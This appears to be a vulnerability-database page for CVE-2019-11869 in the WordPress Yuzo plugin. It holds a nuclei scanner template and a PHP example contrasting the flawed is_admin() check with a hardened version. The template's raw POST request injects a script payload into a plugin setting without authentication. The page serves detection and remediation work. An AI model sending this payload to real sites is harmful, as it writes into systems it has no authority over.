nuclei / ProjectDiscovery / NUCLEI:CVE-2019-11869
History: Dec 25, 2020 - 8:21 a.m.

WordPress Yuzo <5.12.94 - Cross-Site Scripting

2020-12-25 08:21:48
ProjectDiscovery
github.com

CVSS2 score: 4.3 Medium
Attack Vector: NETWORK
Attack Complexity: MEDIUM
Authentication: NONE
Confidentiality Impact: NONE
Integrity Impact: PARTIAL
Availability Impact: NONE
Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3 score: 6.1 Medium
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: REQUIRED
Scope: CHANGED
Confidentiality Impact: LOW
Integrity Impact: LOW
Availability Impact: NONE
Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS: 0.002 Low
Percentile: 55.4%

WordPress Yuzo Related Posts plugin before 5.12.94 is vulnerable to cross-site scripting.

id: CVE-2019-11869

info:
  name: WordPress Yuzo <5.12.94 - Cross-Site Scripting
  author: ganofins
  severity: medium
  description: |
    WordPress Yuzo Related Posts plugin before 5.12.94 is vulnerable to cross-site scripting
    because it mistakenly expects that is_admin() verifies that the
    request comes from an admin user (it actually only verifies that the
    request is for an admin page). An unauthenticated attacker can consequently inject
    a payload into the plugin settings, such as the
    yuzo_related_post_css_and_style setting.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: |
    Update to the latest version of the Yuzo plugin (5.12.94 or higher) to mitigate this vulnerability.
  reference:
    - https://www.wordfence.com/blog/2019/04/yuzo-related-posts-zero-day-vulnerability-exploited-in-the-wild
    - https://wpscan.com/vulnerability/9254
    - https://www.wordfence.com/blog/2019/04/yuzo-related-posts-zero-day-vulnerability-exploited-in-the-wild/
    - https://wpvulndb.com/vulnerabilities/9254
    - https://nvd.nist.gov/vuln/detail/CVE-2019-11869
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-11869
    cwe-id: CWE-79
    epss-score: 0.0018
    epss-percentile: 0.55101
    cpe: cpe:2.3:a:yuzopro:yuzo:5.12.94:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: yuzopro
    product: yuzo
    framework: wordpress
  tags: cve,cve2019,wpscan,wordpress,wp-plugin,xss,yuzopro

http:
  - raw:
      - |
        POST /wp-admin/options-general.php?page=yuzo-related-post HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        yuzo_related_post_css_and_style=</style><script>alert(0);</script>
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "<script>alert(0);</script>")'

      - type: dsl
        dsl:
          - "contains(tolower(header_2), 'text/html')"
# digest: 4a0a00473045022100f262415dcc61709d8131f774eb669f755f68c700968d3fa28706ed6b3e1cef040220617983e4d93971bf21800af6aa075e295f45b1217ea3c05fb47153aefa81d3f9:922c64590222798bb761d5b6d8e72950
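
The root cause named in the template description, is_admin() treated as an authorization check, is shown here next to a corrected form. This is an added example, not the Yuzo plugin's code: the function names, the nonce action and field names are hypothetical, and only the option name yuzo_related_post_css_and_style comes from the page.

```php
<?php
// Hypothetical settings handlers; only the option name is taken from the page.

// Vulnerable pattern: is_admin() is true for ANY request whose URL is under
// /wp-admin/, whether or not the sender is logged in. When code like this
// runs while plugins load, WordPress has not yet enforced the login.
function example_save_settings_vulnerable() {
    if ( is_admin() && isset( $_POST['yuzo_related_post_css_and_style'] ) ) {
        update_option(
            'yuzo_related_post_css_and_style',
            wp_unslash( $_POST['yuzo_related_post_css_and_style'] )
        );
    }
}

// Hardened pattern: authorize the user, verify the request came from the
// plugin's own settings form, and strip markup before storing the value.
function example_save_settings_hardened() {
    if ( ! isset( $_POST['yuzo_related_post_css_and_style'] ) ) {
        return;
    }
    // Capability check: answers "who is asking", which is_admin() does not.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    // Nonce check (hypothetical action and field names): blocks forged posts.
    check_admin_referer( 'example_save_settings', 'example_nonce' );

    // Removes tags such as </style> and <script> from the CSS value.
    $css = wp_strip_all_tags( wp_unslash( $_POST['yuzo_related_post_css_and_style'] ) );
    update_option( 'yuzo_related_post_css_and_style', $css );
}
add_action( 'admin_init', 'example_save_settings_hardened' );

// Output side: strip again when printing, so a value stored before the fix
// cannot close the <style> element on the front end.
function example_print_css() {
    $css = (string) get_option( 'yuzo_related_post_css_and_style', '' );
    echo '<style>' . wp_strip_all_tags( $css ) . '</style>';
}
add_action( 'wp_head', 'example_print_css' );
```

After updating the plugin, the stored option value should still be reviewed, because a value written before the update stays in the database.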
